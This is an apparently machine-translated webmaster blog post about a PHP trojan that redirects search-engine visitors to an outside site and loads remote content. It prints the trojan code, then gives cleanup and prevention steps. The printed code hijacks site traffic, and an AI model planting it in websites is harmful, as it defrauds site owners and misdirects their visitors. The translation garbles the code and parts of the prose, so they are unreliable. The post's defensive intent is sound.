Lead to search engine traffic transfer PHP Trojan horse introduction and prevention

Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall

If your site usually has a lot of traffic, PV is very high, one day PV but began to become less, except to reflect on the content of the site, but also consider whether the site is a trojan, in fact, there has been a long time to lead the search engine traffic transfer of the PHP trojan, simple is that if access traffic from the search engine, then automatically get the So that your site will not be seen by users.

Because my site recently suffered such attacks, so just share the code, I hope for the majority of webmaster have enlightenment, especially for the use of PHP program station Webmaster, or should guard against such attacks. According to the historical situation, this kind of Trojan horse, it seems that a year ago even a few years ago, but may now achieve the effect is not as good as before.

Here is the attack code that leads to a search engine routing traffic:

Error_reporting (E_error);

Header (' content-type:text/html charset=gb2312 ');

$come _from= "baidu.com#google.com.hk#soso.com#sogou.com#cache.baidu.com#google.cn";

$referer = Split ("#", $come _from);

foreach ($referer as $v) {

if (Stristr ($_server[' http_referer '), $v))

{

Header ("Location:".) Http://www.abc.com/3/nb.html? $_server[' server_name ']);

}

}

echo file_get_contents (' http://www.abc.com//xx/dn2.php ');

?>

The code is simple, if the access source is a search engine, it will be located in the following PHP file and HTML file, so that users can not get the desired things. Of course, now each server in accordance with the settings are not the same, some servers even if the upload of such files, or restrictions on implementation;

Here is a simple way to talk about my approach, I hope that you will encounter similar situation in the future help.

The first step is to delete similar php files, such PHP files do not have a fixed name, but are in the root directory, so find it very convenient, delete those unfamiliar files can. Delete After not excited, first go to other directories to look for similar unfamiliar files, see the unfamiliar file opened to see, there are problems directly deleted.

The second step is to continue to see the commonly used system PHP files, to see if these files have recently been modified, if it has been modified, then download down, and then look up the unfamiliar PHP file name, like the original is the appearance of the dv.php, can now search under dv.php, see if it will be modified into this In addition, there will be a real trojan in the general other directory.

The third step can go to 360 Web site security detection platform to see, upload file verification can start testing site is safe; In general, if the site is hung black chain or have invisible text, there will be hints, so it is more useful. Especially for the black chain detection, this function is relatively good, because the black chain is generally hidden, webmaster himself very difficult to think of.

The fourth step is to modify the weak password, whether it is the FTP account password, or Web site background address, or website background login, or what other password, if it feels too weak, like only seven or eight, then the proposed changes more difficult, many sites are cracked, are weak passwords are scanned, Increasing the length of the password for this kind of crack site prevention is still helpful.

Write here, the story basically came to an ending, the site security is urgent, every moment we should pay attention to the safety of the site, you do not pay attention to those who hang black chain will be thinking about you, only to keep improving the safety of the site can try to avoid being black. This article by love not Net (http://www.aibue.com) stationmaster original, reprint share please specify, thank cooperation!